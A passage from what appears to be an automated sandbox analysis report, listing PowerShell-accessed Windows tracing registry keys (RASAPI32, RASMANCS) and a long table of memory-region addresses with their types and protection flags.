HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 96 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
16F6D2A0000
|
heap
|
page read and write
|
||
|
229135A9000
|
heap
|
page read and write
|
||
|
45F9000
|
trusted library allocation
|
page read and write
|
||
|
20C097F0000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
4638000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
22443B57000
|
heap
|
page read and write
|
||
|
E9C0EFE000
|
stack
|
page read and write
|
||
|
1493D000
|
stack
|
page read and write
|
||
|
16ED4970000
|
heap
|
page read and write
|
||
|
1F4A84E0000
|
heap
|
page read and write
|
||
|
4238000
|
trusted library allocation
|
page read and write
|
||
|
147DD000
|
stack
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
229135B7000
|
heap
|
page read and write
|
||
|
66DA3FE000
|
stack
|
page read and write
|
||
|
14D6D000
|
heap
|
page read and write
|
||
|
4215000
|
trusted library allocation
|
page read and write
|
||
|
45F3000
|
trusted library allocation
|
page read and write
|
||
|
42E4000
|
trusted library allocation
|
page read and write
|
||
|
4232000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
4CC8C7E000
|
stack
|
page read and write
|
||
|
45F0000
|
trusted library allocation
|
page read and write
|
||
|
19B6E4C9000
|
heap
|
page read and write
|
||
|
12922450000
|
heap
|
page read and write
|
||
|
22443E05000
|
heap
|
page read and write
|
||
|
2111F27E000
|
heap
|
page read and write
|
||
|
14C54000
|
heap
|
page read and write
|
||
|
272D2D3F000
|
heap
|
page read and write
|
||
|
22443B10000
|
heap
|
page read and write
|
||
|
2203000
|
trusted library allocation
|
page execute and read and write
|
||
|
249D1040000
|
heap
|
page read and write
|
||
|
14D0F000
|
heap
|
page read and write
|
||
|
CBADBFE000
|
stack
|
page read and write
|
||
|
5757FFE000
|
stack
|
page read and write
|
||
|
55DD77F000
|
stack
|
page read and write
|
||
|
1292248F000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
1279D1D0000
|
heap
|
page read and write
|
||
|
2107DC60000
|
heap
|
page read and write
|
||
|
14D6D000
|
heap
|
page read and write
|
||
|
213D5F000
|
unkown
|
page read and write
|
||
|
ED2767F000
|
unkown
|
page read and write
|
||
|
22913885000
|
heap
|
page read and write
|
||
|
2951E7DD000
|
heap
|
page read and write
|
||
|
1279D0D0000
|
heap
|
page read and write
|
||
|
26CC4E10000
|
heap
|
page read and write
|
||
|
7DF5EFE000
|
stack
|
page read and write
|
||
|
12922400000
|
heap
|
page read and write
|
||
|
16ED4A7F000
|
heap
|
page read and write
|
||
|
42D3000
|
trusted library allocation
|
page read and write
|
||
|
423F000
|
trusted library allocation
|
page read and write
|
||
|
2111F505000
|
heap
|
page read and write
|
||
|
69B000
|
heap
|
page read and write
|
||
|
996A9FE000
|
stack
|
page read and write
|
||
|
4206000
|
trusted library allocation
|
page read and write
|
||
|
249D1060000
|
heap
|
page read and write
|
||
|
26CC4E00000
|
heap
|
page read and write
|
||
|
42CA000
|
trusted library allocation
|
page read and write
|
||
|
21417E000
|
stack
|
page read and write
|
||
|
4249000
|
trusted library allocation
|
page read and write
|
||
|
464E000
|
trusted library allocation
|
page read and write
|
||
|
226958F0000
|
heap
|
page read and write
|
||
|
16F6D2C0000
|
heap
|
page read and write
|
||
|
58E000
|
stack
|
page read and write
|
||
|
2D622DC0000
|
heap
|
page read and write
|
||
|
1F4A84F7000
|
heap
|
page read and write
|
||
|
5B6000
|
heap
|
page read and write
|
||
|
1B43FE89000
|
heap
|
page read and write
|
||
|
3D229AC000
|
stack
|
page read and write
|
||
|
68B000
|
heap
|
page read and write
|
||
|
ACD000
|
stack
|
page read and write
|
||
|
4243000
|
trusted library allocation
|
page read and write
|
||
|
464B000
|
trusted library allocation
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
2C8D000
|
heap
|
page read and write
|
||
|
2CB6000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
42D8000
|
trusted library allocation
|
page read and write
|
||
|
2951E7C0000
|
heap
|
page read and write
|
||
|
425D000
|
trusted library allocation
|
page read and write
|
||
|
4235000
|
trusted library allocation
|
page read and write
|
||
|
BCC8EFF000
|
stack
|
page read and write
|
||
|
5757E7C000
|
stack
|
page read and write
|
||
|
E9C0BEF000
|
unkown
|
page read and write
|
||
|
20C097F7000
|
heap
|
page read and write
|
||
|
4644000
|
trusted library allocation
|
page read and write
|
||
|
424E000
|
trusted library allocation
|
page read and write
|
||
|
5757EFF000
|
unkown
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
3AB5B5F000
|
unkown
|
page read and write
|
||
|
3D22D7E000
|
stack
|
page read and write
|
||
|
16F6D320000
|
heap
|
page read and write
|
||
|
268EEE00000
|
heap
|
page read and write
|
||
|
226958A5000
|
heap
|
page read and write
|
||
|
1F4A84E7000
|
heap
|
page read and write
|
||
|
2107DCC8000
|
heap
|
page read and write
|
||
|
303C8FE000
|
stack
|
page read and write
|
||
|
3AB5EFF000
|
stack
|
page read and write
|
||
|
E9C0F7E000
|
stack
|
page read and write
|
||
|
4250000
|
trusted library allocation
|
page read and write
|
||
|
14EAD000
|
stack
|
page read and write
|
||
|
CBADAFF000
|
unkown
|
page read and write
|
||
|
14CE3000
|
heap
|
page read and write
|
||
|
14CE3000
|
heap
|
page read and write
|
||
|
22913880000
|
heap
|
page read and write
|
||
|
2D622EA0000
|
heap
|
page read and write
|
||
|
272D2BC0000
|
heap
|
page read and write
|
||
|
268EECE0000
|
heap
|
page read and write
|
||
|
20C097B5000
|
heap
|
page read and write
|
||
|
1BED1A30000
|
heap
|
page read and write
|
||
|
ED276FF000
|
stack
|
page read and write
|
||
|
4241000
|
trusted library allocation
|
page read and write
|
||
|
19B6E465000
|
heap
|
page read and write
|
||
|
2CAB000
|
heap
|
page read and write
|
||
|
2107DEF5000
|
heap
|
page read and write
|
||
|
97F7000
|
trusted library allocation
|
page read and write
|
||
|
1B43FE00000
|
heap
|
page read and write
|
||
|
22443AF0000
|
heap
|
page read and write
|
||
|
14E6D000
|
unkown
|
page read and write
|
||
|
423C000
|
trusted library allocation
|
page read and write
|
||
|
22913580000
|
heap
|
page read and write
|
||
|
DC9967F000
|
unkown
|
page read and write
|
||
|
C26407C000
|
stack
|
page read and write
|
||
|
575807E000
|
stack
|
page read and write
|
||
|
129223D0000
|
heap
|
page read and write
|
||
|
272D2D00000
|
heap
|
page read and write
|
||
|
996A8FE000
|
stack
|
page read and write
|
||
|
9812000
|
trusted library allocation
|
page read and write
|
||
|
272D2D05000
|
heap
|
page read and write
|
||
|
1475CCE0000
|
heap
|
page read and write
|
||
|
4632000
|
trusted library allocation
|
page read and write
|
||
|
1BED166F000
|
heap
|
page read and write
|
||
|
5757F7F000
|
stack
|
page read and write
|
||
|
272D2CC0000
|
heap
|
page read and write
|
||
|
6A1294F000
|
unkown
|
page read and write
|
||
|
14D03000
|
heap
|
page read and write
|
||
|
14C5C000
|
heap
|
page read and write
|
||
|
463C000
|
trusted library allocation
|
page read and write
|
||
|
226958B0000
|
heap
|
page read and write
|
||
|
14EFE000
|
unkown
|
page read and write
|
||
|
2107DB60000
|
heap
|
page read and write
|
||
|
48C000
|
stack
|
page read and write
|
||
|
C26427E000
|
stack
|
page read and write
|
||
|
21F2000
|
trusted library allocation
|
page execute and read and write
|
||
|
16F6D337000
|
heap
|
page read and write
|
||
|
7C2693C000
|
stack
|
page read and write
|
||
|
268EEEC0000
|
heap
|
page read and write
|
||
|
4208000
|
trusted library allocation
|
page read and write
|
||
|
83D000
|
stack
|
page read and write
|
||
|
4AC9C7F000
|
stack
|
page read and write
|
||
|
4245000
|
trusted library allocation
|
page read and write
|
||
|
42E2000
|
trusted library allocation
|
page read and write
|
||
|
249D0E50000
|
heap
|
page read and write
|
||
|
14C93000
|
heap
|
page read and write
|
||
|
303C56C000
|
stack
|
page read and write
|
||
|
16ED49A0000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
1BED1860000
|
heap
|
page read and write
|
||
|
3D6D8EC000
|
stack
|
page read and write
|
||
|
299D000
|
stack
|
page read and write
|
||
|
7DF5A8C000
|
stack
|
page read and write
|
||
|
2107DCD7000
|
heap
|
page read and write
|
||
|
129223E0000
|
heap
|
page read and write
|
||
|
12922455000
|
heap
|
page read and write
|
||
|
1B43FD00000
|
heap
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
55DD7FE000
|
stack
|
page read and write
|
||
|
3D6D9EF000
|
stack
|
page read and write
|
||
|
45E6000
|
trusted library allocation
|
page read and write
|
||
|
42E7000
|
trusted library allocation
|
page read and write
|
||
|
2D622EC0000
|
heap
|
page read and write
|
||
|
73A000
|
heap
|
page read and write
|
||
|
1B43FE80000
|
heap
|
page read and write
|
||
|
4646000
|
trusted library allocation
|
page read and write
|
||
|
1D62D645000
|
heap
|
page read and write
|
||
|
4218000
|
trusted library allocation
|
page read and write
|
||
|
14C83000
|
heap
|
page read and write
|
||
|
45E9000
|
trusted library allocation
|
page read and write
|
||
|
1D62D640000
|
heap
|
page read and write
|
||
|
4212000
|
trusted library allocation
|
page read and write
|
||
|
2E6E000
|
stack
|
page read and write
|
||
|
1482E000
|
unkown
|
page read and write
|
||
|
26CC4E99000
|
heap
|
page read and write
|
||
|
2BF0000
|
remote allocation
|
page read and write
|
||
|
55DD6FE000
|
unkown
|
page read and write
|
||
|
1B43FE05000
|
heap
|
page read and write
|
||
|
21FB000
|
trusted library allocation
|
page execute and read and write
|
||
|
E9C0B6C000
|
stack
|
page read and write
|
||
|
6A129CF000
|
stack
|
page read and write
|
||
|
6A12CFE000
|
stack
|
page read and write
|
||
|
45E4000
|
trusted library allocation
|
page read and write
|
||
|
2CE5000
|
heap
|
page read and write
|
||
|
66DA27C000
|
stack
|
page read and write
|
||
|
249D0F5B000
|
heap
|
page read and write
|
||
|
16ED4980000
|
heap
|
page read and write
|
||
|
DC997FE000
|
stack
|
page read and write
|
||
|
2C9A000
|
heap
|
page read and write
|
||
|
16F6D327000
|
heap
|
page read and write
|
||
|
1B43FE10000
|
heap
|
page read and write
|
||
|
1475CED7000
|
heap
|
page read and write
|
||
|
20C09730000
|
heap
|
page read and write
|
||
|
16F6D4D0000
|
heap
|
page read and write
|
||
|
60E000
|
stack
|
page read and write
|
||
|
14C9D000
|
heap
|
page read and write
|
||
|
2951E9D5000
|
heap
|
page read and write
|
||
|
1279D185000
|
heap
|
page read and write
|
||
|
2111F269000
|
heap
|
page read and write
|
||
|
20C09760000
|
heap
|
page read and write
|
||
|
14C2D000
|
heap
|
page read and write
|
||
|
26CC51F5000
|
heap
|
page read and write
|
||
|
149FE000
|
heap
|
page read and write
|
||
|
42F1000
|
trusted library allocation
|
page read and write
|
||
|
268EED09000
|
heap
|
page read and write
|
||
|
4648000
|
trusted library allocation
|
page read and write
|
||
|
423A000
|
trusted library allocation
|
page read and write
|
||
|
2CCC000
|
heap
|
page read and write
|
||
|
20C097B0000
|
heap
|
page read and write
|
||
|
66DA47E000
|
stack
|
page read and write
|
||
|
4CC88AC000
|
stack
|
page read and write
|
||
|
2107DCDF000
|
heap
|
page read and write
|
||
|
1A95A7E000
|
unkown
|
page read and write
|
||
|
4AC9CFE000
|
stack
|
page read and write
|
||
|
19B6E420000
|
heap
|
page read and write
|
||
|
1475CDC0000
|
heap
|
page read and write
|
||
|
21B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4641000
|
trusted library allocation
|
page read and write
|
||
|
14C7C000
|
heap
|
page read and write
|
||
|
1279CFF0000
|
heap
|
page read and write
|
||
|
463F000
|
trusted library allocation
|
page read and write
|
||
|
142F0000
|
trusted library allocation
|
page read and write
|
||
|
2CAB000
|
heap
|
page read and write
|
||
|
2CA5000
|
heap
|
page read and write
|
||
|
2D622F00000
|
heap
|
page read and write
|
||
|
422F000
|
trusted library allocation
|
page read and write
|
||
|
19B6E400000
|
heap
|
page read and write
|
||
|
4228000
|
trusted library allocation
|
page read and write
|
||
|
1BED1840000
|
heap
|
page read and write
|
||
|
2CE5000
|
heap
|
page read and write
|
||
|
ED2777E000
|
stack
|
page read and write
|
||
|
14C20000
|
heap
|
page read and write
|
||
|
BCC8FFE000
|
stack
|
page read and write
|
||
|
1F4A8440000
|
heap
|
page read and write
|
||
|
2951E9D0000
|
heap
|
page read and write
|
||
|
14D0F000
|
heap
|
page read and write
|
||
|
ED273AC000
|
stack
|
page read and write
|
||
|
26CC4EAE000
|
heap
|
page read and write
|
||
|
14D13000
|
heap
|
page read and write
|
||
|
4CC8CFE000
|
stack
|
page read and write
|
||
|
7C26CFE000
|
stack
|
page read and write
|
||
|
970000
|
trusted library allocation
|
page read and write
|
||
|
14CEC000
|
heap
|
page read and write
|
||
|
1D62D46D000
|
heap
|
page read and write
|
||
|
1BED1650000
|
heap
|
page read and write
|
||
|
680000
|
heap
|
page read and write
|
||
|
1F4A84FD000
|
heap
|
page read and write
|
||
|
1A957CC000
|
stack
|
page read and write
|
||
|
4226000
|
trusted library allocation
|
page read and write
|
||
|
4CC892F000
|
unkown
|
page read and write
|
||
|
213DDF000
|
stack
|
page read and write
|
||
|
2D623105000
|
heap
|
page read and write
|
||
|
462F000
|
trusted library allocation
|
page read and write
|
||
|
DC9977E000
|
stack
|
page read and write
|
||
|
16ED4890000
|
heap
|
page read and write
|
||
|
ED277FF000
|
stack
|
page read and write
|
||
|
1279D1D7000
|
heap
|
page read and write
|
||
|
26CC4E90000
|
heap
|
page read and write
|
||
|
1279D1E9000
|
heap
|
page read and write
|
||
|
3AB5BDF000
|
stack
|
page read and write
|
||
|
3D22CFF000
|
stack
|
page read and write
|
||
|
1BED1657000
|
heap
|
page read and write
|
||
|
4AC996C000
|
stack
|
page read and write
|
||
|
9B5000
|
heap
|
page read and write
|
||
|
1475CDE0000
|
heap
|
page read and write
|
||
|
3D6DCFE000
|
stack
|
page read and write
|
||
|
3D6D96F000
|
unkown
|
page read and write
|
||
|
303C5EF000
|
unkown
|
page read and write
|
||
|
14D0F000
|
heap
|
page read and write
|
||
|
1279D0F0000
|
heap
|
page read and write
|
||
|
422D000
|
trusted library allocation
|
page read and write
|
||
|
14759000
|
heap
|
page read and write
|
||
|
1D62D450000
|
heap
|
page read and write
|
||
|
14D6D000
|
heap
|
page read and write
|
||
|
14E1D000
|
stack
|
page read and write
|
||
|
CBADB7E000
|
stack
|
page read and write
|
||
|
1475CEC7000
|
heap
|
page read and write
|
||
|
19B6E460000
|
heap
|
page read and write
|
||
|
14C4C000
|
heap
|
page read and write
|
||
|
D09B18E000
|
unkown
|
page read and write
|
||
|
2247000
|
trusted library allocation
|
page execute and read and write
|
||
|
149E1000
|
heap
|
page read and write
|
||
|
26CC4E30000
|
heap
|
page read and write
|
||
|
D09B4FE000
|
stack
|
page read and write
|
||
|
16ED4A69000
|
heap
|
page read and write
|
||
|
2C83000
|
heap
|
page read and write
|
||
|
2111F0A0000
|
heap
|
page read and write
|
||
|
4223000
|
trusted library allocation
|
page read and write
|
||
|
D09B57E000
|
stack
|
page read and write
|
||
|
4202000
|
trusted library allocation
|
page read and write
|
||
|
1B43FEA0000
|
heap
|
page read and write
|
||
|
97E4000
|
trusted library allocation
|
page read and write
|
||
|
22443E00000
|
heap
|
page read and write
|
||
|
26CC4EA7000
|
heap
|
page read and write
|
||
|
64E000
|
stack
|
page read and write
|
||
|
CBADA7C000
|
stack
|
page read and write
|
||
|
2111F500000
|
heap
|
page read and write
|
||
|
1F4A8500000
|
heap
|
page read and write
|
||
|
303C97F000
|
stack
|
page read and write
|
||
|
1F4A8430000
|
heap
|
page read and write
|
||
|
26CC51F0000
|
heap
|
page read and write
|
||
|
1279D1F0000
|
heap
|
page read and write
|
||
|
422B000
|
trusted library allocation
|
page read and write
|
||
|
6A12C7E000
|
stack
|
page read and write
|
||
|
1475CEDD000
|
heap
|
page read and write
|
||
|
2C88000
|
heap
|
page read and write
|
||
|
19B6E4B0000
|
heap
|
page read and write
|
||
|
249D0F40000
|
heap
|
page read and write
|
||
|
C2640FE000
|
unkown
|
page read and write
|
||
|
3AB5ADC000
|
stack
|
page read and write
|
||
|
1475CE55000
|
heap
|
page read and write
|
||
|
249D0F47000
|
heap
|
page read and write
|
||
|
2CB4000
|
heap
|
page read and write
|
||
|
2111F277000
|
heap
|
page read and write
|
||
|
249D10D0000
|
heap
|
page read and write
|
||
|
14BE0000
|
heap
|
page read and write
|
||
|
4635000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
1B43FE97000
|
heap
|
page read and write
|
||
|
249D0F5E000
|
heap
|
page read and write
|
||
|
7DF5B0E000
|
unkown
|
page read and write
|
||
|
14C73000
|
heap
|
page read and write
|
||
|
21B2000
|
trusted library allocation
|
page execute and read and write
|
||
|
42D5000
|
trusted library allocation
|
page read and write
|
||
|
19B6E4CC000
|
heap
|
page read and write
|
||
|
14C19000
|
heap
|
page read and write
|
||
|
226957C0000
|
heap
|
page read and write
|
||
|
D09B47E000
|
stack
|
page read and write
|
||
|
249D0F57000
|
heap
|
page read and write
|
||
|
272D2D20000
|
heap
|
page read and write
|
||
|
14290000
|
trusted library allocation
|
page read and write
|
||
|
1BED1760000
|
heap
|
page read and write
|
||
|
4255000
|
trusted library allocation
|
page read and write
|
||
|
22443B48000
|
heap
|
page read and write
|
||
|
16ED4A60000
|
heap
|
page read and write
|
||
|
45E2000
|
trusted library allocation
|
page read and write
|
||
|
2D622F1D000
|
heap
|
page read and write
|
||
|
2107DC40000
|
heap
|
page read and write
|
||
|
996A58C000
|
stack
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
460B000
|
trusted library allocation
|
page read and write
|
||
|
2F6F000
|
stack
|
page read and write
|
||
|
42DD000
|
trusted library allocation
|
page read and write
|
||
|
14C8C000
|
heap
|
page read and write
|
||
|
2CE5000
|
heap
|
page read and write
|
||
|
16ED4A83000
|
heap
|
page read and write
|
||
|
22913770000
|
heap
|
page read and write
|
||
|
2D623100000
|
heap
|
page read and write
|
||
|
960000
|
unkown
|
page read and write
|
||
|
19B6E4CF000
|
heap
|
page read and write
|
||
|
14CCC000
|
heap
|
page read and write
|
||
|
268EEEC5000
|
heap
|
page read and write
|
||
|
66DA2FF000
|
unkown
|
page read and write
|
||
|
2111F260000
|
heap
|
page read and write
|
||
|
1D62D2B0000
|
heap
|
page read and write
|
||
|
46D0000
|
trusted library allocation
|
page read and write
|
||
|
2D622F09000
|
heap
|
page read and write
|
||
|
3AB5E7E000
|
stack
|
page read and write
|
||
|
2269590C000
|
heap
|
page read and write
|
||
|
1475CE50000
|
heap
|
page read and write
|
||
|
2107DCC0000
|
heap
|
page read and write
|
||
|
42F4000
|
trusted library allocation
|
page read and write
|
||
|
272D2CA0000
|
heap
|
page read and write
|
||
|
226958A0000
|
heap
|
page read and write
|
||
|
462C000
|
trusted library allocation
|
page read and write
|
||
|
22443B5F000
|
heap
|
page read and write
|
||
|
89F000
|
stack
|
page read and write
|
||
|
2140FE000
|
stack
|
page read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
4204000
|
trusted library allocation
|
page read and write
|
||
|
984F000
|
trusted library allocation
|
page read and write
|
||
|
1B43FE9D000
|
heap
|
page read and write
|
||
|
2951E9E0000
|
heap
|
page read and write
|
||
|
1A95BFE000
|
stack
|
page read and write
|
||
|
6A128CC000
|
stack
|
page read and write
|
||
|
996A87F000
|
unkown
|
page read and write
|
||
|
2ECE000
|
stack
|
page read and write
|
||
|
4CC89AF000
|
stack
|
page read and write
|
||
|
4718000
|
trusted library allocation
|
page read and write
|
||
|
3D22DFF000
|
stack
|
page read and write
|
||
|
149F5000
|
heap
|
page read and write
|
||
|
4672000
|
trusted library allocation
|
page read and write
|
||
|
14C45000
|
heap
|
page read and write
|
||
|
3100000
|
heap
|
page read and write
|
||
|
2951E8C0000
|
heap
|
page read and write
|
||
|
213CDC000
|
stack
|
page read and write
|
||
|
2951E7C9000
|
heap
|
page read and write
|
||
|
295D000
|
stack
|
page read and write
|
||
|
229135A0000
|
heap
|
page read and write
|
||
|
7C26C7E000
|
stack
|
page read and write
|
||
|
2254000
|
trusted library allocation
|
page execute and read and write
|
||
|
149EB000
|
heap
|
page read and write
|
||
|
55DD87E000
|
stack
|
page read and write
|
||
|
303C87F000
|
stack
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
1F4A8785000
|
heap
|
page read and write
|
||
|
16F6D4D5000
|
heap
|
page read and write
|
||
|
1F4A8460000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
1BED1668000
|
heap
|
page read and write
|
||
|
268EED00000
|
heap
|
page read and write
|
||
|
22913570000
|
heap
|
page read and write
|
||
|
229135BD000
|
heap
|
page read and write
|
||
|
226958D0000
|
heap
|
page read and write
|
||
|
1486D000
|
stack
|
page read and write
|
||
|
1279D180000
|
heap
|
page read and write
|
||
|
14C6C000
|
heap
|
page read and write
|
||
|
2BF0000
|
remote allocation
|
page read and write
|
||
|
14CA4000
|
heap
|
page read and write
|
||
|
BCC8E7E000
|
unkown
|
page read and write
|
||
|
420D000
|
trusted library allocation
|
page read and write
|
||
|
45EB000
|
trusted library allocation
|
page read and write
|
||
|
4749000
|
trusted library allocation
|
page read and write
|
||
|
420B000
|
trusted library allocation
|
page read and write
|
||
|
9750000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
14C63000
|
heap
|
page read and write
|
||
|
7DF5E7E000
|
stack
|
page read and write
|
||
|
42DB000
|
trusted library allocation
|
page read and write
|
||
|
1475CEC0000
|
heap
|
page read and write
|
||
|
1B43FDE0000
|
heap
|
page read and write
|
||
|
19B6E3F0000
|
heap
|
page read and write
|
||
|
BCC8F7E000
|
stack
|
page read and write
|
||
|
2CAB000
|
heap
|
page read and write
|
||
|
2107DCDC000
|
heap
|
page read and write
|
||
|
66DA37F000
|
stack
|
page read and write
|
||
|
12922477000
|
heap
|
page read and write
|
||
|
16F6D1C0000
|
heap
|
page read and write
|
||
|
2BF0000
|
remote allocation
|
page read and write
|
||
|
2CB4000
|
heap
|
page read and write
|
||
|
E9C0E7F000
|
stack
|
page read and write
|
||
|
268EEC00000
|
heap
|
page read and write
|
||
|
20C09740000
|
heap
|
page read and write
|
||
|
22443AE0000
|
heap
|
page read and write
|
||
|
4252000
|
trusted library allocation
|
page read and write
|
||
|
BCC8BCC000
|
stack
|
page read and write
|
||
|
45ED000
|
trusted library allocation
|
page read and write
|
||
|
16F6D33D000
|
heap
|
page read and write
|
||
|
DC996FF000
|
stack
|
page read and write
|
||
|
3D6DC7E000
|
stack
|
page read and write
|
||
|
4220000
|
trusted library allocation
|
page read and write
|
||
|
2111F180000
|
heap
|
page read and write
|
||
|
7C269BF000
|
unkown
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
42E9000
|
trusted library allocation
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
CBADC7E000
|
stack
|
page read and write
|
||
|
14D13000
|
heap
|
page read and write
|
||
|
2111F1A0000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
14D13000
|
heap
|
page read and write
|
||
|
2CCC000
|
heap
|
page read and write
|
||
|
7DF5B8F000
|
stack
|
page read and write
|
||
|
14C63000
|
heap
|
page read and write
|
||
|
2951E9A0000
|
heap
|
page read and write
|
||
|
14BDE000
|
unkown
|
page read and write
|
||
|
14CFC000
|
heap
|
page read and write
|
||
|
1D62D3B0000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
4AC9D7E000
|
stack
|
page read and write
|
||
|
22443B40000
|
heap
|
page read and write
|
||
|
4DC000
|
stack
|
page read and write
|
||
|
D09B10C000
|
stack
|
page read and write
|
||
|
268EED1D000
|
heap
|
page read and write
|
||
|
1D62D390000
|
heap
|
page read and write
|
||
|
472C000
|
trusted library allocation
|
page read and write
|
||
|
DC993EC000
|
stack
|
page read and write
|
||
|
19B6E4B9000
|
heap
|
page read and write
|
||
|
272D2D27000
|
heap
|
page read and write
|
||
|
14CDC000
|
heap
|
page read and write
|
||
|
1D62D467000
|
heap
|
page read and write
|
||
|
2C77000
|
heap
|
page read and write
|
||
|
3D22C7F000
|
unkown
|
page read and write
|
||
|
420F000
|
trusted library allocation
|
page read and write
|
||
|
996A97F000
|
stack
|
page read and write
|
||
|
C2641FE000
|
stack
|
page read and write
|
||
|
425B000
|
trusted library allocation
|
page read and write
|
||
|
1A95B7E000
|
stack
|
page read and write
|
||
|
736000
|
heap
|
page read and write
|
||
|
21407F000
|
stack
|
page read and write
|
||
|
16ED4975000
|
heap
|
page read and write
|
||
|
4AC99EE000
|
unkown
|
page read and write
|
||
|
2107DEF0000
|
heap
|
page read and write
|
||
|
14CF3000
|
heap
|
page read and write
|
||
|
55DD67C000
|
stack
|
page read and write
|
||
|
149ED000
|
heap
|
page read and write
|
||
|
226958F9000
|
heap
|
page read and write
|
||
|
14C34000
|
heap
|
page read and write
|
||
|
1A95AFF000
|
stack
|
page read and write
|
||
|
249D10D5000
|
heap
|
page read and write
|
||
|
2CBC000
|
heap
|
page read and write
|
||
|
21EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
148BE000
|
unkown
|
page read and write
|
||
|
1F4A8780000
|
heap
|
page read and write
|
||
|
7C26D7E000
|
stack
|
page read and write
|
||
|
4711000
|
trusted library allocation
|
page read and write
|
||
|
2951E7D7000
|
heap
|
page read and write
|
||
|
14940000
|
heap
|
page read and write
|
||
|
12922470000
|
heap
|
page read and write
|
||
|
1D62D459000
|
heap
|
page read and write
|
||
|
20C0980F000
|
heap
|
page read and write
|
||
|
C26417F000
|
stack
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
1BED1A35000
|
heap
|
page read and write
|
||
|
224E000
|
trusted library allocation
|
page execute and read and write
|
||
|
45FF000
|
trusted library allocation
|
page read and write
|
||
|
93C000
|
stack
|
page read and write
|
There are 509 hidden memdumps, click here to show them.